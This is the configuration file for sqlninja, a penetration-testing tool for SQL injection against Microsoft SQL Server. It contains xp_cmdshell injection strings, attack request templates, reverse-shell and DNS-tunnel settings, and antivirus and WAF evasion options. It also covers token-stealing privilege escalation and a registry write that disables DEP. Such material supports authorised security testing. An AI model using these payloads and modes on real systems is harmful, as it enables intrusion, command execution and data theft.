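###################################
# SQLNINJA CONFIGURATION FILE #
###################################

# options are case sensitive
# see sqlninja-howto.html for more information and examples
#
# NOTE: once filled in, this file holds live session cookies, credentials
# and target details for the engagement. Keep it out of version control and
# shared locations, and remove it when the engagement is over.

############ HTTP REQUEST ############
# The entire HTTP request, including the exploit string and a marker for the
# SQL command to execute (__SQL2INJECT__)
# Be sure to include the vulnerable parameter and the character sequence that
# allows us to start injecting commands. In general this means, at least:
# - an apostrophe (if the parameter is a string)
# - a semicolon (to end the original query)
# It must also include everything necessary to properly close the original
# query, like an appropriate number of closing brackets. Don't forget to
# URL-encode, where needed (e.g. a space must become '%20' or '+')
#
# For instance, if you need to inject something like the following:
# aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'--
# then the parameter should look like this:
# aaa=1&bbb=x';__SQL2INJECT__
#
# Make sure that:
# 1. The --httprequest_start-- and --httprequest_end-- markers are in place
# 2. All required headers are present
# 3. There are no spaces at the beginning of a line
# 4. There are no comment lines between the two markers
# Consider copying the exact request that triggers the injection from a proxy
# intercept (e.g.: BurpSuite), if unsure. The Cookie and Authorization values
# in the examples below are placeholders: replace them with the real values
# captured for the target, or the request will not be authenticated.
#
# GET EXAMPLE:
# --httprequest_start--
# GET http://www.victim.com/page.asp?vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah HTTP/1.0
# Host: www.victim.com
# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
# Accept-Language: en-us,en;q=0.7,it;q=0.3
# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
# Content-Type: application/x-www-form-urlencoded
# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
# Connection: close
# --httprequest_end--
#
# POST EXAMPLE: (The Content-Length header is automatically added by sqlninja!)
# --httprequest_start--
# POST https://www.victim.com/page.asp HTTP/1.0
# Host: www.victim.com
# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
# Accept-Language: en-us,en;q=0.7,it;q=0.3
# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
# Content-Type: application/x-www-form-urlencoded
# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
# Connection: close
#
# vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah
# --httprequest_end--
#
# HEADER-BASED EXAMPLE:
# --httprequest_start--
# GET http://www.victim.com/page.asp HTTP/1.0
# Host: www.victim.com
# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
# Accept-Language: en-us,en;q=0.7,it;q=0.3
# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
# Content-Type: application/x-www-form-urlencoded
# Cookie: VulnCookie=xxx'%3B__SQL2INJECT__
# Connection: close
# --httprequest_end--
#
# Note that in the last example the semicolon was encoded, otherwise the server would not
# parse __SQL2INJECT__ as part of VulnCookie

# Local host: your IP address (for backscan and revshell modes).
# The target must be able to reach this address for those modes to work, so
# use the address of the interface facing the target, not a placeholder.
lhost = 192.168.60.1

# Interface to sniff when in backscan mode (should be the interface that
# owns lhost)
device = eth0

# Evasion techniques to be used. Possible choices are:
# 1 - Query hex-encoding
# 2 - Comments as separators
# 3 - Random case
# 4 - Random URI encoding
# All techniques can be combined, so the following is legal:
# evasion = 1234
# However, keep in mind that using too many techniques at once leads to very
# long queries, that might create problems when using GET. Default: no evasion
# evasion = 12

# Path to the metasploit installation. Only needed if msfpayload and
# msfcli are not already in the path. Adjust to your own installation.
msfpath = /home/user/trunk/

# Encoder to use with msfencode. If the option is not present, no encoding
# is used. However, it's definitely recommended to use it, if you suspect that
# an AV is present. A list of available encoders can be retrieved by simply
# running "msfencode -l"
# msfencoder = x86/shikata_ga_nai

# Number of times to encode the metasploit payload. Default: 5
# msfencodecount = 4

# If you can execute commands but SQL Server does not run as SYSTEM,
# you can use churrasco.exe to steal the appropriate token and escalate
# privileges. Enable this option to use churrasco.exe before executing
# a command. This is especially useful with the metasploit module and VNC.
# Obviously, you first need to upload churrasco.exe using
# the upload module! Keep in mind that the uploaded binary stays on the
# target until you remove it.
# Possible values: yes/no
usechurrasco = no

# Proxy host to use (default: none)
# proxyhost = 127.0.0.1

# Proxy port to use (default: 8080)
# proxyport = 8080


# Domain to use for dnstunnel mode. DNS queries for this domain have to end
# up at the host running sqlninja, so use a domain you control and whose
# delegation points there (see sqlninja-howto.html); the value below is only
# an example.
domain = sqlninja.net

# tcpdump filter (optional)
# filter = src host x.x.x.x

# Backscan timeout after web request conclusion (Default: 5 secs)
# timeout = 5

# Maximum hostname length for DNS tunnel (Max: 250 - Default: 250)
# hostnamelength = 250

# IP address to return to DNS queries (default: 10.255.255.254)
# resolvedip = 10.255.255.254

# Name of the procedure to use/create to launch commands. Default is
# "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used
# for each command
# xp_name = xp_cmdshell

# Time value for the WAITFOR during inference attack of fingerprint and
# bruteforce mode. A higher value makes things slower but will yield more
# precise results against slow targets.
# Min: 3 seconds. Max: 59 seconds. Default: 5 seconds
blindtime = 5

# Number of script lines to upload with a single HTTP request. A higher number
# obviously means a faster upload. However, do not push this too high if your
# request contains very long parameters. Maximum is 30, and 10 is a default
# safe value providing already a good speed
# lines_per_request = 10

# If the remote server returns a custom error page instead of a standard
# HTTP error code (e.g. 500 Server Error), it is wise to set this value to
# some string that is present in such a page. This will help sqlninja in
# figuring out if things seem to be wrong
# errorstring = "an error has occurred"

# By default, sqlninja appends two hyphens to the injected query in order
# to comment out any spurious SQL code. This is good and works in
# approximately 99% of the cases. However, you might want to change this
# behavior in some very specific scenarios. Change this setting only if you
# really know what you are doing.
# Possible values: yes/no
# appendcomment = yes

# When using the Metasploit module DEP is not a problem anymore, since in
# all recent versions of the framework the stager will take care of it by
# itself. However, if needed you can still roll back to the old sqlninja
# behavior and disable DEP by whitelisting the stager with a call to
# xp_regwrite. To do so, set 'checkdep' to 'yes'. Note that this writes to
# the target's registry: the change persists after the session and should
# be reverted during cleanup.
# checkdep = no

# You can override the standard marker used to detect where to inject the
# sql attack code. You will probably never need to change this
# sqlmarker = __SQL2INJECT__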